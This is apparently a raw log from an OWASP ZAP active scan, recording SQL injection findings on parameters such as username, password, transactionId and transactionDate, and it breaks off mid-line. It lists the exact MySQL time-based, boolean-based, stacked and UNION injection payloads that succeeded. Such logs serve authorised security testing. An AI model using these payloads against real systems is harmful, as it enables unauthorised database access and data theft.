[ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423698 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9423702 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423706 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9423764 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9423768 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9423772 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'username' 9423773 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9424866 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9425216 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'msg' is not injectable 9434099 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [ZAP' AND (SELECT * FROM (SELECT(SLEEP(5)))VZzy) AND 'gFcd'='gFcd] on parameter 'password' 9434100 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9434146 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9434151 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9434156 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9434161 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9434210 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9434217 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9434218 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [ZAP' #] on parameter 'password' 9434219 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9435542 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [895 AND (SELECT * FROM (SELECT(SLEEP(5)))jTqM)] on parameter 'transactionId' 9435543 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9435819 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'transactionDate' is not injectable 9445991 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [empty' AND (SELECT * FROM (SELECT(SLEEP(5)))nwiP) AND 'luQQ'='luQQ] on parameter 'description' 9446009 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9446011 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL > 5.0.11 stacked queries (SELECT - comment) with payload [2010-02-02;(SELECT * FROM (SELECT(SLEEP(5)))jHxy)#] on parameter 'transactionDate' 9446012 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9456024 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))NFeO) AND 'gsCj'='gsCj] on parameter 'transactionDate' 9456025 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9456389 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 9456389 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 9456394 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 9456839 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 9456841 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 9456860 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-02-02' AND 8740=8740 AND 'HAQG'='HAQG] on parameter 'transactionDate' 9456861 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9466392 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [895 AND (SELECT * FROM (SELECT(SLEEP(5)))ioru)] on parameter 'transactionId' 9466393 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9466668 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [david' AND 8837=8837 AND 'GPtw'='GPtw] on parameter 'username' 9466669 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9466939 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))qqfd) AND 'lFQe'='lFQe] on parameter 'transactionDate' 9466940 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9466989 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9466996 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9467001 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9467006 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9467064 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9467069 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9467076 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9467081 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9467266 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [133 AND 5158=5158] on parameter 'transactionId' 9467267 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9476749 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [david' AND (SELECT * FROM (SELECT(SLEEP(5)))uDQU) AND 'jxys'='jxys] on parameter 'username' 9476750 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9476791 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9476796 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9476881 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9476887 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 2 column in query 9476890 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [david' #] on parameter 'username' 9476890 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9477334 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [133 AND (SELECT * FROM (SELECT(SLEEP(5)))qslE)] on parameter 'transactionId' 9477335 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9477351 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9477356 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9477404 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9477410 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9477431 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9477435 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9477439 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [133 #] on parameter 'transactionId' 9477440 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9477695 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 9464=9464] on parameter 'minBalanace' 9477696 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9477716 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (4984=4984) THEN 4984 ELSE 4984*(SELECT 4984 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9477718 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9487767 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [10000 AND (SELECT * FROM (SELECT(SLEEP(5)))pxoL)] on parameter 'minBalanace' 9487769 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9487783 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9487787 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))efms)] on parameter 'msgid' 9487788 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9487790 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9487832 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9487838 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9487855 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9487862 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9487899 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9487907 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9488099 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [1 AND 5945=5945] on parameter 'msgId' 9488100 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9488115 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (7435=7435) THEN 7435 ELSE 7435*(SELECT 7435 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionId' 9488116 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9498183 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))OQUi)] on parameter 'msgId' 9498184 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9498199 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498199 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))SZdA)-- eRtU] on parameter 'transactionId' 9498200 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9498206 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9498214 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498221 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9498252 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498260 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9498266 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498271 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9498281 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498286 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 3 column in query 9498287 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'msgId' 9498288 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9498292 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9498296 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9498302 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [1 #] on parameter 'transactionId' 9498304 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9498320 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (9470=9470) THEN 9470 ELSE 9470*(SELECT 9470 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'transactionDate' 9498329 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9508381 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01 AND (SELECT * FROM (SELECT(SLEEP(5)))dcDQ)] on parameter 'transactionDate' 9508382 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9508396 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9508400 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9508432 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9508436 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9508452 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9508456 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 4 column in query 9508459 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01 #] on parameter 'transactionDate' 9508460 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9508520 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 5364=5364 AND 'dDnH'='dDnH] on parameter 'transactionDate' 9508521 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9508642 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-02-02' AND (SELECT * FROM (SELECT(SLEEP(5)))yBJU) AND 'nDkT'='nDkT] on parameter 'transactionDate' 9508643 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9508920 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 2266=2266 AND 'nOOY'='nOOY] on parameter 'transactionDate' 9508921 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9518596 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))ukTX) AND 'roYS'='roYS] on parameter 'transactionDate' 9518597 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9518645 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9518649 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9518652 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9518656 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9518707 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9518712 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9518714 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test 9518719 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine - target url appears to have 1 column in query 9518940 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (1685=1685) THEN 1685 ELSE 1685*(SELECT 1685 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'orderby' 9518941 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9518986 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))Hewd) AND 'Cxfd'='Cxfd] on parameter 'transactionDate' 9518987 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9519120 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9519121 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9519329 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [2010-01-01' AND 9328=9328 AND 'tUCi'='tUCi] on parameter 'transactionDate' 9519330 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9528997 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [1 AND (SELECT * FROM (SELECT(SLEEP(5)))mUFh)] on parameter 'orderby' 9528998 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9529331 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] AND boolean-based blind - WHERE or HAVING clause with payload [10000 AND 7494=7494] on parameter 'minBalanace' 9529332 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9529405 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND time-based blind (SELECT) with payload [2010-01-01' AND (SELECT * FROM (SELECT(SLEEP(5)))Ewxb) AND 'srwg'='srwg] on parameter 'transactionDate' 9529406 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9529550 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [UNION-BASED Injection Found] MySQL UNION query (NULL) - 1 to 10 columns with payload [2010-01-01' #] on parameter 'transactionDate' 9529551 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9529751 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [BOOLEAN-BASED Injection Found] MySQL >= 5.0 boolean-based blind - Parameter replace with payload [(SELECT (CASE WHEN (1118=1118) THEN 1118 ELSE 1118*(SELECT 1118 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] on parameter 'msgid' 9529752 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 9539390 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - [TIME-BASED Injection Found] MySQL >= 5.0.12 AND 